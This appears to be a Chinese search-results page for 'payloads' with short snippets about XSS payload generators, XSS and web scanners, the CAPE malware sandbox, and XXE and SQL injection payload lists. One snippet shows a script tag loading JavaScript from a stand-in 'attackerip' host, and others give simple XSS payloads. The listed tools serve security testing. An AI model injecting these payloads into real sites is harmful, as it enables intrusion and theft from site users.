搜索 “payloads”

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞：alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

XSS-LOADER TOOLS 一个XSS Payload生成器，多合一工具-XSS扫描，XSS挖掘。 XSS-LOADER界面 功能特征 Basic Payload 将默认参数设置为：<script>alert(1)</script> *Div Payload 将默认参数设置为：<div onpointerover='alert(1)'>MOVE HERE</div *Img Payload 将默认参数设置为：<img s...

XSS-Freak XSS-Freak是python3编写的xss扫描器。它会在网站上搜寻（进行爆破式扫描）所有可能的链接和目录以扩大其攻击范围。然后，它们会在其中搜索输入标签，然后启动一堆xss payloads。如果输入没有经过清理并且容易受到xss攻击，则该工具将拒绝… XSS-Freak：XSS扫描器 要求 一个看似存在 XSS 的网页一台能够跑多线程的 pc ...

CAPE 恶意软件配置和Payload提取 CAPE是一个恶意软件沙箱。自动执行恶意软件分析过程，目标是从恶意软件中提取Payload和配置。这使CAPE能够基于Payload签名检测恶意软件，并实现了恶意软件逆向工程和威胁情报的许多目标的自动化，亦可用于取证分析等场景。 从最初在样本上运行时，CAPE可以检测到许多恶意软件技术或行为以及特定的恶意...

WAScan - Web应用程序扫描器 WAScan是一个开源Web应用程序安全扫描程序。它旨在使用“黑匣子”方法查找各种漏洞，这意味着它不会研究Web应用程序的源代码，而是像模糊测试器（fuzzer）一样工作，扫描已部署的Web应用程序的页面，提取链接和表单并进行攻击脚本，发送payloads并查找错误消息，等等。WAScan基于python2.7构建，并且可以在具有...

XML (XXE) 注入Payload List 在本节中，我们将解释什么是XML注入，描述一些常见的示例，解释如何发现和利用各种XXE注入，并总结如何防止XXE注入攻击。 什么是XML注入？ XML注入（也称为XXE）是一个Web安全漏洞，它使攻击者能够干扰应用程序对XML数据的处理。它通常使攻击者可以查看应用程序服务器文件系统上的文件，并与应用程序本...

SQL注入Payload List 本文中解释什么是SQL注入，罗列一些常见SQL注入语句示例，常见SQL注入扫描工具等。 什么是SQL注入（SQLi）？ SQL注入是一个网络安全漏洞，它使攻击者能够干扰应用程序对其数据库的查询。通常，它使攻击者可以查看他们通常无法检索的数据。这可能包括属于其他用户的数据，或者应用程序本身能够访问的任何其他数...